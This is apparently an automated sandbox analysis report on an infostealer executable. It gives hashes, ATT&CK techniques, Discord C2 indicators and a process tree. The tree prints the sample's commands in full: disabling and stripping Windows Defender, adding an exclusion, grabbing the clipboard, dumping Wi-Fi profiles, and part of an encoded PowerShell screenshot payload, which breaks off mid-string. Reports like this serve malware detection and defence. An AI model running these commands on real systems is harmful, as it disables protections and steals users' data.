db8ce32d8cedcc2eb2af55988c4db24d86a6d9ca3e3caba2877330421ab190bb

Analysis

max time kernel
90s
max time network
94s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
08-10-2024 21:47

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

db8ce32d8cedcc2eb2af55988c4db24d86a6d9ca3e3caba2877330421ab190bbN.exe
Size

8.4MB
MD5

eb57ec9eec7e90c3bf1515d1fcd10350
SHA1

08e8626aad864a82cb1da6b8ede62eea35b9e23a
SHA256

db8ce32d8cedcc2eb2af55988c4db24d86a6d9ca3e3caba2877330421ab190bb
SHA512

1a16b2355b8ea39f64bf0c652747dfa1693d5d2cc8471a7a7ca2dbfab190f31cfecfd8c0dc6b276f824d28178eed8cd534185c97e3018ff88fba41888c7181c4
SSDEEP

196608:GteY79V+urErvI9pWjgfPvzm6gsGcEg4Ar:oeY8urEUWjC3zDQcd4Ar

Score

8^/10

collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
4476	powershell.exe
1984	powershell.exe
2084	powershell.exe
4176	powershell.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
1952	cmd.exe
3044	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
1208	rar.exe

Loads dropped DLL 18 IoCs

pid	Process
4992	db8ce32d8cedcc2eb2af55988c4db24d86a6d9ca3e3caba2877330421ab190bbN.exe
4992	db8ce32d8cedcc2eb2af55988c4db24d86a6d9ca3e3caba2877330421ab190bbN.exe
4992	db8ce32d8cedcc2eb2af55988c4db24d86a6d9ca3e3caba2877330421ab190bbN.exe
4992	db8ce32d8cedcc2eb2af55988c4db24d86a6d9ca3e3caba2877330421ab190bbN.exe
4992	db8ce32d8cedcc2eb2af55988c4db24d86a6d9ca3e3caba2877330421ab190bbN.exe
4992	db8ce32d8cedcc2eb2af55988c4db24d86a6d9ca3e3caba2877330421ab190bbN.exe
4992	db8ce32d8cedcc2eb2af55988c4db24d86a6d9ca3e3caba2877330421ab190bbN.exe
4992	db8ce32d8cedcc2eb2af55988c4db24d86a6d9ca3e3caba2877330421ab190bbN.exe
4992	db8ce32d8cedcc2eb2af55988c4db24d86a6d9ca3e3caba2877330421ab190bbN.exe
4992	db8ce32d8cedcc2eb2af55988c4db24d86a6d9ca3e3caba2877330421ab190bbN.exe
4992	db8ce32d8cedcc2eb2af55988c4db24d86a6d9ca3e3caba2877330421ab190bbN.exe
4992	db8ce32d8cedcc2eb2af55988c4db24d86a6d9ca3e3caba2877330421ab190bbN.exe
4992	db8ce32d8cedcc2eb2af55988c4db24d86a6d9ca3e3caba2877330421ab190bbN.exe
4992	db8ce32d8cedcc2eb2af55988c4db24d86a6d9ca3e3caba2877330421ab190bbN.exe
4992	db8ce32d8cedcc2eb2af55988c4db24d86a6d9ca3e3caba2877330421ab190bbN.exe
4992	db8ce32d8cedcc2eb2af55988c4db24d86a6d9ca3e3caba2877330421ab190bbN.exe
4992	db8ce32d8cedcc2eb2af55988c4db24d86a6d9ca3e3caba2877330421ab190bbN.exe
4992	db8ce32d8cedcc2eb2af55988c4db24d86a6d9ca3e3caba2877330421ab190bbN.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
20	discord.com
21	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
18	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 3 IoCs

discovery

Process Discovery

T1057

pid	Process
2100	tasklist.exe
2248	tasklist.exe
4300	tasklist.exe

UPX packed file 55 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x0007000000023d09-63.dat	upx
behavioral2/memory/4992-67-0x00007FFBF2A40000-0x00007FFBF3032000-memory.dmp	upx
behavioral2/files/0x0007000000023cd5-70.dat	upx
behavioral2/memory/4992-72-0x00007FFC05F00000-0x00007FFC05F24000-memory.dmp	upx
behavioral2/files/0x0007000000023d07-71.dat	upx
behavioral2/files/0x0007000000023cda-126.dat	upx
behavioral2/memory/4992-127-0x00007FFC0BB40000-0x00007FFC0BB4F000-memory.dmp	upx
behavioral2/files/0x0007000000023cd9-125.dat	upx
behavioral2/files/0x0007000000023cd8-124.dat	upx
behavioral2/files/0x0007000000023cd7-123.dat	upx
behavioral2/files/0x0007000000023cd6-122.dat	upx
behavioral2/files/0x0008000000023cd4-121.dat	upx
behavioral2/files/0x0007000000023d0f-120.dat	upx
behavioral2/files/0x0007000000023d0d-119.dat	upx
behavioral2/files/0x0007000000023d0c-118.dat	upx
behavioral2/files/0x0007000000023d08-115.dat	upx
behavioral2/files/0x0007000000023d06-114.dat	upx
behavioral2/memory/4992-132-0x00007FFC05E50000-0x00007FFC05E7D000-memory.dmp	upx
behavioral2/memory/4992-133-0x00007FFC03CA0000-0x00007FFC03CB9000-memory.dmp	upx
behavioral2/memory/4992-134-0x00007FFC029D0000-0x00007FFC029F3000-memory.dmp	upx
behavioral2/memory/4992-135-0x00007FFBF2720000-0x00007FFBF289E000-memory.dmp	upx
behavioral2/memory/4992-136-0x00007FFC033A0000-0x00007FFC033B9000-memory.dmp	upx
behavioral2/memory/4992-137-0x00007FFC025D0000-0x00007FFC025DD000-memory.dmp	upx
behavioral2/memory/4992-138-0x00007FFC023D0000-0x00007FFC02403000-memory.dmp	upx
behavioral2/memory/4992-140-0x00007FFC01CB0000-0x00007FFC01D7D000-memory.dmp	upx
behavioral2/memory/4992-139-0x00007FFBF2A40000-0x00007FFBF3032000-memory.dmp	upx
behavioral2/memory/4992-143-0x00007FFC05F00000-0x00007FFC05F24000-memory.dmp	upx
behavioral2/memory/4992-141-0x00007FFBF21F0000-0x00007FFBF2719000-memory.dmp	upx
behavioral2/memory/4992-144-0x00007FFC025B0000-0x00007FFC025C4000-memory.dmp	upx
behavioral2/memory/4992-146-0x00007FFC025A0000-0x00007FFC025AD000-memory.dmp	upx
behavioral2/memory/4992-148-0x00007FFBF20D0000-0x00007FFBF21EC000-memory.dmp	upx
behavioral2/memory/4992-147-0x00007FFC03CA0000-0x00007FFC03CB9000-memory.dmp	upx
behavioral2/memory/4992-145-0x00007FFC05E50000-0x00007FFC05E7D000-memory.dmp	upx
behavioral2/memory/4992-149-0x00007FFC029D0000-0x00007FFC029F3000-memory.dmp	upx
behavioral2/memory/4992-152-0x00007FFBF2720000-0x00007FFBF289E000-memory.dmp	upx
behavioral2/memory/4992-190-0x00007FFC033A0000-0x00007FFC033B9000-memory.dmp	upx
behavioral2/memory/4992-254-0x00007FFC025D0000-0x00007FFC025DD000-memory.dmp	upx
behavioral2/memory/4992-266-0x00007FFC023D0000-0x00007FFC02403000-memory.dmp	upx
behavioral2/memory/4992-269-0x00007FFC01CB0000-0x00007FFC01D7D000-memory.dmp	upx
behavioral2/memory/4992-271-0x00007FFBF21F0000-0x00007FFBF2719000-memory.dmp	upx
behavioral2/memory/4992-293-0x00007FFBF2A40000-0x00007FFBF3032000-memory.dmp	upx
behavioral2/memory/4992-312-0x00007FFC029D0000-0x00007FFC029F3000-memory.dmp	upx
behavioral2/memory/4992-321-0x00007FFBF20D0000-0x00007FFBF21EC000-memory.dmp	upx
behavioral2/memory/4992-320-0x00007FFC025A0000-0x00007FFC025AD000-memory.dmp	upx
behavioral2/memory/4992-319-0x00007FFC025B0000-0x00007FFC025C4000-memory.dmp	upx
behavioral2/memory/4992-318-0x00007FFBF21F0000-0x00007FFBF2719000-memory.dmp	upx
behavioral2/memory/4992-317-0x00007FFC01CB0000-0x00007FFC01D7D000-memory.dmp	upx
behavioral2/memory/4992-316-0x00007FFC023D0000-0x00007FFC02403000-memory.dmp	upx
behavioral2/memory/4992-315-0x00007FFC025D0000-0x00007FFC025DD000-memory.dmp	upx
behavioral2/memory/4992-314-0x00007FFC033A0000-0x00007FFC033B9000-memory.dmp	upx
behavioral2/memory/4992-313-0x00007FFBF2720000-0x00007FFBF289E000-memory.dmp	upx
behavioral2/memory/4992-311-0x00007FFC03CA0000-0x00007FFC03CB9000-memory.dmp	upx
behavioral2/memory/4992-310-0x00007FFC05E50000-0x00007FFC05E7D000-memory.dmp	upx
behavioral2/memory/4992-309-0x00007FFC0BB40000-0x00007FFC0BB4F000-memory.dmp	upx
behavioral2/memory/4992-308-0x00007FFC05F00000-0x00007FFC05F24000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
4012	cmd.exe
464	netsh.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
4244	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
4072	systeminfo.exe

Suspicious behavior: EnumeratesProcesses 21 IoCs

pid	Process
4476	powershell.exe
4176	powershell.exe
4176	powershell.exe
4476	powershell.exe
4476	powershell.exe
4176	powershell.exe
4176	powershell.exe
3044	powershell.exe
3044	powershell.exe
4948	powershell.exe
4948	powershell.exe
3044	powershell.exe
4948	powershell.exe
1984	powershell.exe
1984	powershell.exe
928	powershell.exe
928	powershell.exe
2084	powershell.exe
2084	powershell.exe
3512	powershell.exe
3512	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4476	powershell.exe
Token: SeDebugPrivilege	2100	tasklist.exe
Token: SeDebugPrivilege	2248	tasklist.exe
Token: SeDebugPrivilege	4176	powershell.exe
Token: SeDebugPrivilege	3044	powershell.exe
Token: SeIncreaseQuotaPrivilege	4468	WMIC.exe
Token: SeSecurityPrivilege	4468	WMIC.exe
Token: SeTakeOwnershipPrivilege	4468	WMIC.exe
Token: SeLoadDriverPrivilege	4468	WMIC.exe
Token: SeSystemProfilePrivilege	4468	WMIC.exe
Token: SeSystemtimePrivilege	4468	WMIC.exe
Token: SeProfSingleProcessPrivilege	4468	WMIC.exe
Token: SeIncBasePriorityPrivilege	4468	WMIC.exe
Token: SeCreatePagefilePrivilege	4468	WMIC.exe
Token: SeBackupPrivilege	4468	WMIC.exe
Token: SeRestorePrivilege	4468	WMIC.exe
Token: SeShutdownPrivilege	4468	WMIC.exe
Token: SeDebugPrivilege	4468	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4468	WMIC.exe
Token: SeRemoteShutdownPrivilege	4468	WMIC.exe
Token: SeUndockPrivilege	4468	WMIC.exe
Token: SeManageVolumePrivilege	4468	WMIC.exe
Token: 33	4468	WMIC.exe
Token: 34	4468	WMIC.exe
Token: 35	4468	WMIC.exe
Token: 36	4468	WMIC.exe
Token: SeDebugPrivilege	4300	tasklist.exe
Token: SeIncreaseQuotaPrivilege	4468	WMIC.exe
Token: SeSecurityPrivilege	4468	WMIC.exe
Token: SeTakeOwnershipPrivilege	4468	WMIC.exe
Token: SeLoadDriverPrivilege	4468	WMIC.exe
Token: SeSystemProfilePrivilege	4468	WMIC.exe
Token: SeSystemtimePrivilege	4468	WMIC.exe
Token: SeProfSingleProcessPrivilege	4468	WMIC.exe
Token: SeIncBasePriorityPrivilege	4468	WMIC.exe
Token: SeCreatePagefilePrivilege	4468	WMIC.exe
Token: SeBackupPrivilege	4468	WMIC.exe
Token: SeRestorePrivilege	4468	WMIC.exe
Token: SeShutdownPrivilege	4468	WMIC.exe
Token: SeDebugPrivilege	4468	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4468	WMIC.exe
Token: SeRemoteShutdownPrivilege	4468	WMIC.exe
Token: SeUndockPrivilege	4468	WMIC.exe
Token: SeManageVolumePrivilege	4468	WMIC.exe
Token: 33	4468	WMIC.exe
Token: 34	4468	WMIC.exe
Token: 35	4468	WMIC.exe
Token: 36	4468	WMIC.exe
Token: SeDebugPrivilege	4948	powershell.exe
Token: SeDebugPrivilege	1984	powershell.exe
Token: SeDebugPrivilege	928	powershell.exe
Token: SeIncreaseQuotaPrivilege	2476	WMIC.exe
Token: SeSecurityPrivilege	2476	WMIC.exe
Token: SeTakeOwnershipPrivilege	2476	WMIC.exe
Token: SeLoadDriverPrivilege	2476	WMIC.exe
Token: SeSystemProfilePrivilege	2476	WMIC.exe
Token: SeSystemtimePrivilege	2476	WMIC.exe
Token: SeProfSingleProcessPrivilege	2476	WMIC.exe
Token: SeIncBasePriorityPrivilege	2476	WMIC.exe
Token: SeCreatePagefilePrivilege	2476	WMIC.exe
Token: SeBackupPrivilege	2476	WMIC.exe
Token: SeRestorePrivilege	2476	WMIC.exe
Token: SeShutdownPrivilege	2476	WMIC.exe
Token: SeDebugPrivilege	2476	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1844 wrote to memory of 4992	1844	db8ce32d8cedcc2eb2af55988c4db24d86a6d9ca3e3caba2877330421ab190bbN.exe	85
PID 1844 wrote to memory of 4992	1844	db8ce32d8cedcc2eb2af55988c4db24d86a6d9ca3e3caba2877330421ab190bbN.exe	85
PID 4992 wrote to memory of 3820	4992	db8ce32d8cedcc2eb2af55988c4db24d86a6d9ca3e3caba2877330421ab190bbN.exe	89
PID 4992 wrote to memory of 3820	4992	db8ce32d8cedcc2eb2af55988c4db24d86a6d9ca3e3caba2877330421ab190bbN.exe	89
PID 4992 wrote to memory of 4448	4992	db8ce32d8cedcc2eb2af55988c4db24d86a6d9ca3e3caba2877330421ab190bbN.exe	90
PID 4992 wrote to memory of 4448	4992	db8ce32d8cedcc2eb2af55988c4db24d86a6d9ca3e3caba2877330421ab190bbN.exe	90
PID 4448 wrote to memory of 4476	4448	cmd.exe	93
PID 4448 wrote to memory of 4476	4448	cmd.exe	93
PID 4992 wrote to memory of 2120	4992	db8ce32d8cedcc2eb2af55988c4db24d86a6d9ca3e3caba2877330421ab190bbN.exe	94
PID 4992 wrote to memory of 2120	4992	db8ce32d8cedcc2eb2af55988c4db24d86a6d9ca3e3caba2877330421ab190bbN.exe	94
PID 4992 wrote to memory of 100	4992	db8ce32d8cedcc2eb2af55988c4db24d86a6d9ca3e3caba2877330421ab190bbN.exe	95
PID 4992 wrote to memory of 100	4992	db8ce32d8cedcc2eb2af55988c4db24d86a6d9ca3e3caba2877330421ab190bbN.exe	95
PID 2120 wrote to memory of 2100	2120	cmd.exe	98
PID 2120 wrote to memory of 2100	2120	cmd.exe	98
PID 4992 wrote to memory of 4400	4992	db8ce32d8cedcc2eb2af55988c4db24d86a6d9ca3e3caba2877330421ab190bbN.exe	99
PID 4992 wrote to memory of 4400	4992	db8ce32d8cedcc2eb2af55988c4db24d86a6d9ca3e3caba2877330421ab190bbN.exe	99
PID 4992 wrote to memory of 1952	4992	db8ce32d8cedcc2eb2af55988c4db24d86a6d9ca3e3caba2877330421ab190bbN.exe	100
PID 4992 wrote to memory of 1952	4992	db8ce32d8cedcc2eb2af55988c4db24d86a6d9ca3e3caba2877330421ab190bbN.exe	100
PID 100 wrote to memory of 2248	100	cmd.exe	102
PID 100 wrote to memory of 2248	100	cmd.exe	102
PID 4992 wrote to memory of 628	4992	db8ce32d8cedcc2eb2af55988c4db24d86a6d9ca3e3caba2877330421ab190bbN.exe	103
PID 4992 wrote to memory of 628	4992	db8ce32d8cedcc2eb2af55988c4db24d86a6d9ca3e3caba2877330421ab190bbN.exe	103
PID 3820 wrote to memory of 4176	3820	cmd.exe	106
PID 3820 wrote to memory of 4176	3820	cmd.exe	106
PID 1952 wrote to memory of 3044	1952	cmd.exe	107
PID 1952 wrote to memory of 3044	1952	cmd.exe	107
PID 4992 wrote to memory of 624	4992	db8ce32d8cedcc2eb2af55988c4db24d86a6d9ca3e3caba2877330421ab190bbN.exe	108
PID 4992 wrote to memory of 624	4992	db8ce32d8cedcc2eb2af55988c4db24d86a6d9ca3e3caba2877330421ab190bbN.exe	108
PID 4992 wrote to memory of 4012	4992	db8ce32d8cedcc2eb2af55988c4db24d86a6d9ca3e3caba2877330421ab190bbN.exe	109
PID 4992 wrote to memory of 4012	4992	db8ce32d8cedcc2eb2af55988c4db24d86a6d9ca3e3caba2877330421ab190bbN.exe	109
PID 4992 wrote to memory of 4760	4992	db8ce32d8cedcc2eb2af55988c4db24d86a6d9ca3e3caba2877330421ab190bbN.exe	111
PID 4992 wrote to memory of 4760	4992	db8ce32d8cedcc2eb2af55988c4db24d86a6d9ca3e3caba2877330421ab190bbN.exe	111
PID 4992 wrote to memory of 1260	4992	db8ce32d8cedcc2eb2af55988c4db24d86a6d9ca3e3caba2877330421ab190bbN.exe	114
PID 4992 wrote to memory of 1260	4992	db8ce32d8cedcc2eb2af55988c4db24d86a6d9ca3e3caba2877330421ab190bbN.exe	114
PID 4400 wrote to memory of 4468	4400	cmd.exe	115
PID 4400 wrote to memory of 4468	4400	cmd.exe	115
PID 628 wrote to memory of 4300	628	cmd.exe	118
PID 628 wrote to memory of 4300	628	cmd.exe	118
PID 624 wrote to memory of 3640	624	cmd.exe	119
PID 624 wrote to memory of 3640	624	cmd.exe	119
PID 1260 wrote to memory of 4948	1260	cmd.exe	120
PID 1260 wrote to memory of 4948	1260	cmd.exe	120
PID 4012 wrote to memory of 464	4012	cmd.exe	121
PID 4012 wrote to memory of 464	4012	cmd.exe	121
PID 4760 wrote to memory of 4072	4760	cmd.exe	122
PID 4760 wrote to memory of 4072	4760	cmd.exe	122
PID 4992 wrote to memory of 4064	4992	db8ce32d8cedcc2eb2af55988c4db24d86a6d9ca3e3caba2877330421ab190bbN.exe	123
PID 4992 wrote to memory of 4064	4992	db8ce32d8cedcc2eb2af55988c4db24d86a6d9ca3e3caba2877330421ab190bbN.exe	123
PID 4064 wrote to memory of 1904	4064	cmd.exe	125
PID 4064 wrote to memory of 1904	4064	cmd.exe	125
PID 4992 wrote to memory of 2664	4992	db8ce32d8cedcc2eb2af55988c4db24d86a6d9ca3e3caba2877330421ab190bbN.exe	126
PID 4992 wrote to memory of 2664	4992	db8ce32d8cedcc2eb2af55988c4db24d86a6d9ca3e3caba2877330421ab190bbN.exe	126
PID 2664 wrote to memory of 3252	2664	cmd.exe	144
PID 2664 wrote to memory of 3252	2664	cmd.exe	144
PID 4992 wrote to memory of 4340	4992	db8ce32d8cedcc2eb2af55988c4db24d86a6d9ca3e3caba2877330421ab190bbN.exe	129
PID 4992 wrote to memory of 4340	4992	db8ce32d8cedcc2eb2af55988c4db24d86a6d9ca3e3caba2877330421ab190bbN.exe	129
PID 4948 wrote to memory of 4208	4948	powershell.exe	130
PID 4948 wrote to memory of 4208	4948	powershell.exe	130
PID 4340 wrote to memory of 4884	4340	cmd.exe	132
PID 4340 wrote to memory of 4884	4340	cmd.exe	132
PID 4992 wrote to memory of 3968	4992	db8ce32d8cedcc2eb2af55988c4db24d86a6d9ca3e3caba2877330421ab190bbN.exe	133
PID 4992 wrote to memory of 3968	4992	db8ce32d8cedcc2eb2af55988c4db24d86a6d9ca3e3caba2877330421ab190bbN.exe	133
PID 3968 wrote to memory of 2656	3968	cmd.exe	135
PID 3968 wrote to memory of 2656	3968	cmd.exe	135

C:\Users\Admin\AppData\Local\Temp\db8ce32d8cedcc2eb2af55988c4db24d86a6d9ca3e3caba2877330421ab190bbN.exe
"C:\Users\Admin\AppData\Local\Temp\db8ce32d8cedcc2eb2af55988c4db24d86a6d9ca3e3caba2877330421ab190bbN.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1844
- C:\Users\Admin\AppData\Local\Temp\db8ce32d8cedcc2eb2af55988c4db24d86a6d9ca3e3caba2877330421ab190bbN.exe
  "C:\Users\Admin\AppData\Local\Temp\db8ce32d8cedcc2eb2af55988c4db24d86a6d9ca3e3caba2877330421ab190bbN.exe"
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:4992
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\db8ce32d8cedcc2eb2af55988c4db24d86a6d9ca3e3caba2877330421ab190bbN.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3820
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\db8ce32d8cedcc2eb2af55988c4db24d86a6d9ca3e3caba2877330421ab190bbN.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4176
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4448
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4476
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2120
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:2100
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:100
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:2248
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4400
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4468
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    - Suspicious use of WriteProcessMemory
    PID:1952
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3044
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:628
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:4300
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:624
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3640
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    - Suspicious use of WriteProcessMemory
    PID:4012
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:464
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4760
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:4072
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgAC